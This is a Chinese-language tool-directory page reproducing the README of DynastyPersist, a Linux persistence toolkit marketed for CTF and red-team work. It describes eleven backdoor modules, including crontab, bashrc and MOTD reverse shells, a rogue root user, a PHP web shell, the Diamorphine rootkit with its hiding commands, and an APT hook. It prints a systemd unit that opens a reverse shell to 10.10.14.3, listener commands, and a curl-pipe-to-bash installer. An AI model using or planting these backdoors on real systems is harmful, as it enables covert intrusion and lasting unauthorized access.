Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
DynastyPersist — Linux持久化工具包,包含11个模块,用于SSH密钥后门、cron作业、systemd服务、LKM rootkit和LD_PRELOAD权限提升。专为CTF竞赛和红队操作设计。 | Kitploit
工具/GitHubGitHub/trevohack/dynastypersist
权限提升持久化机制后渗透利用CTF渗透测试红队
GitHubtrevohack/dynastypersist

DynastyPersist

Linux持久化工具包,包含11个模块,用于SSH密钥后门、cron作业、systemd服务、LKM rootkit和LD_PRELOAD权限提升。专为CTF竞赛和红队操作设计。

查看仓库
1622111个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

DynastyPersist 1.5

DynastyPersist:一个简化 Linux 持久化操作的流线型工具。
支持 KoTH、Battlegrounds 和渗透测试操作

GitHub License GitHub Repo stars Static Badge

安装 • 文档 • 用法

image

文档

[ 功能特性 ]

功能特性描述
SSH 密钥生成自动生成 SSH 密钥,用于隐秘访问。
计划任务持久化设置计划任务以实现定时持久化。
创建带 root 权限的自定义用户创建一个拥有 root 权限的自定义用户。
RCE 持久化通过远程代码执行实现持久化。
LKM/ Rootkit演示基于 Linux 内核模块 (LKM) 的 rootkit 持久化。
Bashrc 持久化修改用户特定的 shell 初始化文件以实现持久化(别名/反弹 shell)。
针对 root 的 Systemd 服务设置一个 systemd 服务以实现 root 持久化。
LD_PRELOAD 权限提升配置配置 LD_PRELOAD 以进行权限提升。
后门化每日消息/头部对系统消息显示进行后门化,实现隐秘访问。
修改现有 Systemd 服务操纵现有 systemd 服务以实现持久化。
后门化 APT 命令后门化 apt 命令,使其在执行时弹出一个 shell。

[ 模块 ]

SSH 密钥生成

  • 通过 ssh 密钥生成获得服务器的访问权限。此模块为每个用户创建一个 id_rsa 密钥,可用于反向访问。运行此模块后,攻击者可以通过 ssh 连接到服务器。

  • 也可以手动使用 ssh-keygen 命令完成。但该模块能快速为每个用户创建私钥。

root@kitploit:~
root@kali ~ ssh -i id_rsa [email protected]
  • 模块编号:1

计划任务持久化

  • Linux 中的计划任务是按指定间隔自动运行的定时任务。

  • 这是最有效的模块之一,涉及反弹 shell。此模块直接将反弹 shell 命令写入 /etc/crontab,将在您监听的端口上弹出一个 shell。

root@kitploit:~
root@kali ~ nc -nvlp 9999
  • 模块编号:2

创建带 root 权限的自定义用户

  • 一种简单快速的获取反向访问的方法。该模块创建一个具有 root 访问权限的新用户。之后,攻击者可以通过 ssh 登录该用户。
root@kitploit:~
root@kali ~ ssh [email protected]
  • 模块编号:3

RCE 持久化

  • 此模块附带一个托管在 web 根目录下的 php 脚本。脚本位于 /var/www/html/dynasty_rce/rce.php。此外,如果先运行了 LKM 模块,可以隐藏前缀 dynasty_rce。

  • 访问 victim_ip:port/dynasty_rce/rce.php 将赋予您在 shell 中执行命令的能力。

  • 模块编号:4

LKM Rootkit

  • 一种高级持久化方法,将 rootkit 植入服务器内核。该程序专注于一个名为 Diamorphine 的开源 LKM rootkit。模块位于 /var/tmp/.memory 临时目录。设置完成后,此目录将被删除。
  • 以下代码块展示了此模块的用途。
root@kitploit:~
victim@ubuntu ~ kill -64 0 # 提权至 root 用户。
victim@ubuntu ~ mkdir dynasty_persist # 以 dynasty 开头的任何目录都将被隐藏。
victim@ubuntu ~ kill -31 <process> # 隐藏进程
victim@ubuntu ~ lsmod | grep -i diamorphine # 隐藏自身
victim@ubuntu ~ kill -63 0 # 使其出现在 lsmod 输出中
  • 模块编号:5

Bashrc 持久化

  • 此模块写入反弹 shell 命令、别名和变量以实现反向访问。当用户登录服务器或使用 find、cat 命令时,会弹出一个 shell。
root@kitploit:~
root@kali ~ nc -nvlp 9999
  • 模块编号:6

针对 root 的 Systemd 服务

  • 在 systemd 中创建自定义服务以实现反向访问。

  • 示例:

root@kitploit:~
Description=Dynasty Persist

[Service]
ExecStart=sudo bash /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/9999 0>&1'
Restart=always
RestartSec=30

[Install]
WantedBy=default.target"
  • 上述示例将作为一个服务创建。此方法高效且持久。

  • 模块编号:7

LD_PRELOAD 权限提升配置

  • LD_PRELOAD 是 Linux 中的一个环境变量,允许用户在其他库之前预加载共享库。利用 LD_PRELOAD 进行权限提升涉及加载恶意库以拦截和修改系统调用,从而可能获得提升的权限。该模块后门化了 find 和 wget 等命令。

  • 模块编号:8

后门化每日消息/头部

  • Linux 中的“每日消息”(MOTD) 是一个可自定义的文本,在用户登录时显示,提供系统信息或更新。通常存储在 /etc/motd 文件中,可由系统管理员修改。

  • 此模块将 shell 写入 /etc/update-motd.d/00-header。通常在用户登录时触发。

  • 模块编号:9

修改现有 Systemd 服务

  • 类似于模块 7,此模块修改现有服务以实现反向访问。

  • 简单来说,它将服务中的 ExecStartPre 重写为反弹 shell 命令。

  • 模块编号:10

后门化 APT

  • "APT" 代表高级软件包工具,常用于基于 Debian 的系统,如 Ubuntu。文件将位于:/etc/apt/apt.conf.d/42backdoor

  • 后门化 apt 命令,每当运行 apt 时,都会弹出一个 shell。

  • 模块编号:11

[ 模式 ]

  • 当前最新版本(1.4)提供 2 种模式。

  • 模式包括 console 和 ctf,它们被设计为以特定行为工作。

  • 相比而言,console 模式比 ctf 模式提供更多功能和稳定性。

Console

  • console 模式以常规设置进入工具,包含所有功能。这些功能将在脚本执行的本地主机上本地运行。专为实时操作中的持久化而设计。

  • 前缀 use 后跟模块编号可用于运行任何选定的模块。例如:use 1

  • 此外,界面已更新,键入 show payloads 时现在会显示模块/载荷。

  • 最后,帮助/选项菜单也已修改,输入 show options 即可查看。

CTF

  • ctf 模式是一个额外功能,用于通过 SSH 登录已攻陷的服务器并获得持久化。此附加功能在 KoTH 或 Battlegrounds 中会很有帮助。此外,它将节省设置持久化所需的大量时间。

  • 运行 console 中的大部分功能。

[ 用法 ]

  • 使用该工具的语法如下:
root@kitploit:~
$ ./dynasty.sh <lhost> <lport> <mode> 
$ ./dynasty.sh ctf 
$ ./dynasty.sh 10.10.14.3 9999 console 

安装

通过 Git

root@kitploit:~
$ git clone https://github.com/Trevohack/DynastyPersist
$ cd DynastyPersist/src 

通过 Curl

root@kitploit:~
$ curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash

谢谢!

下载工具